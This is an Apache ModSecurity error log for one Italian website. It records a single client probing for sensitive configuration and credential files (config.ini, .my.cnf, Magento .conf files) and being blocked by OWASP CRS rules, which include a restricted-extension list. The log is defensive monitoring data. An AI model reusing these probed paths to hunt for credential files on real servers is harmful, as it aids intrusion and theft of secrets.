[Sat Feb 08 02:54:43.727918 2025] [:error] [pid 1012386] [client 185.246.189.156:34212] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config.ini"] [unique_id "Z6a5Y9rM4reT14y-1XVENAAAAAY"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:43.729380 2025] [:error] [pid 1012386] [client 185.246.189.156:34212] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config.ini"] [unique_id "Z6a5Y9rM4reT14y-1XVENAAAAAY"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:43.729893 2025] [:error] [pid 1012386] [client 185.246.189.156:34212] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config.ini"] [unique_id "Z6a5Y9rM4reT14y-1XVENAAAAAY"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:43.753540 2025] [:error] [pid 1012389] [client 185.246.189.156:34220] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/pleskwp.ini"] [unique_id "Z6a5Y5WgbnbMeZFmNmE4MQAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:43.755106 2025] [:error] [pid 1012389] [client 185.246.189.156:34220] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/pleskwp.ini"] [unique_id "Z6a5Y5WgbnbMeZFmNmE4MQAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:54:43.755573 2025] [:error] [pid 1012389] [client 185.246.189.156:34220] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/pleskwp.ini"] [unique_id "Z6a5Y5WgbnbMeZFmNmE4MQAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.476121 2025] [:error] [pid 1012450] [client 185.246.189.156:54796] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "Z6a5d5auqcLpi7kGZoDNXQAAAAs"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.477686 2025] [:error] [pid 1012450] [client 185.246.189.156:54796] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "Z6a5d5auqcLpi7kGZoDNXQAAAAs"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.478147 2025] [:error] [pid 1012450] [client 185.246.189.156:54796] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.restore.conf"] [unique_id "Z6a5d5auqcLpi7kGZoDNXQAAAAs"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.812290 2025] [:error] [pid 1008961] [client 185.246.189.156:54784] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "Z6a5d9PCPzuZ5FKaAwAvuQAAAAI"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.813776 2025] [:error] [pid 1008961] [client 185.246.189.156:54784] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "Z6a5d9PCPzuZ5FKaAwAvuQAAAAI"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.814276 2025] [:error] [pid 1008961] [client 185.246.189.156:54784] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/config.cfg"] [unique_id "Z6a5d9PCPzuZ5FKaAwAvuQAAAAI"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.941688 2025] [:error] [pid 1012456] [client 185.246.189.156:54852] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "Z6a5dwurHlE6Y7pUFpYhhwAAAA0"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.943217 2025] [:error] [pid 1012456] [client 185.246.189.156:54852] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "Z6a5dwurHlE6Y7pUFpYhhwAAAA0"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:03.943673 2025] [:error] [pid 1012456] [client 185.246.189.156:54852] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config.cfg"] [unique_id "Z6a5dwurHlE6Y7pUFpYhhwAAAA0"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.400644 2025] [:error] [pid 1012386] [client 185.246.189.156:54780] [client 185.246.189.156] ModSecurity: Warning. Matched phrase ".my.cnf" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .my.cnf found within REQUEST_FILENAME: /.my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "Z6a5eNrM4reT14y-1XVENQAAAAY"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.401500 2025] [:error] [pid 1012386] [client 185.246.189.156:54780] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "Z6a5eNrM4reT14y-1XVENQAAAAY"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.402037 2025] [:error] [pid 1012386] [client 185.246.189.156:54780] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.my.cnf"] [unique_id "Z6a5eNrM4reT14y-1XVENQAAAAY"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.429120 2025] [:error] [pid 1012389] [client 185.246.189.156:54826] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "Z6a5eJWgbnbMeZFmNmE4MgAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.438835 2025] [:error] [pid 1012389] [client 185.246.189.156:54826] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "Z6a5eJWgbnbMeZFmNmE4MgAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.439329 2025] [:error] [pid 1012389] [client 185.246.189.156:54826] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/m2-media-downloader/.m2media.conf"] [unique_id "Z6a5eJWgbnbMeZFmNmE4MgAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.551507 2025] [:error] [pid 1012385] [client 185.246.189.156:54838] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "Z6a5eOK4mqz-EfNgDdxuDQAAAAU"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.552312 2025] [:error] [pid 1012385] [client 185.246.189.156:54838] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "Z6a5eOK4mqz-EfNgDdxuDQAAAAU"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.552599 2025] [:error] [pid 1012385] [client 185.246.189.156:54838] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.m2-remote-to-local.conf"] [unique_id "Z6a5eOK4mqz-EfNgDdxuDQAAAAU"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.632236 2025] [:error] [pid 1012451] [client 185.246.189.156:54824] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "Z6a5eG_hRQ_tVRoCv8sMjgAAAAw"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.632960 2025] [:error] [pid 1012451] [client 185.246.189.156:54824] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "Z6a5eG_hRQ_tVRoCv8sMjgAAAAw"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.633174 2025] [:error] [pid 1012451] [client 185.246.189.156:54824] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.m2media.conf"] [unique_id "Z6a5eG_hRQ_tVRoCv8sMjgAAAAw"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.856629 2025] [:error] [pid 1012389] [client 185.246.189.156:54892] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "Z6a5eJWgbnbMeZFmNmE4MwAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.858319 2025] [:error] [pid 1012389] [client 185.246.189.156:54892] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "Z6a5eJWgbnbMeZFmNmE4MwAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:04.858874 2025] [:error] [pid 1012389] [client 185.246.189.156:54892] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/magento2-media-downloader-bash-script/.m2media.conf"] [unique_id "Z6a5eJWgbnbMeZFmNmE4MwAAAAo"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:45.267463 2025] [:error] [pid 1012475] [client 185.246.189.156:45398] [client 185.246.189.156] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/config/wo.conf"] [unique_id "Z6a5oWltQTN_w3JddQ9vvAAAAA4"], referer: https://economiasolidale.38121.it/
[Sat Feb 08 02:55:45.268935 2025] [:error] [pid 1012475] [client 185.246.189.156:45398] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/wo.conf"] [unique_id "Z6a5oWltQTN_w3JddQ9vvAAAAA4"], referer: https://economiasolidale.38121.it/
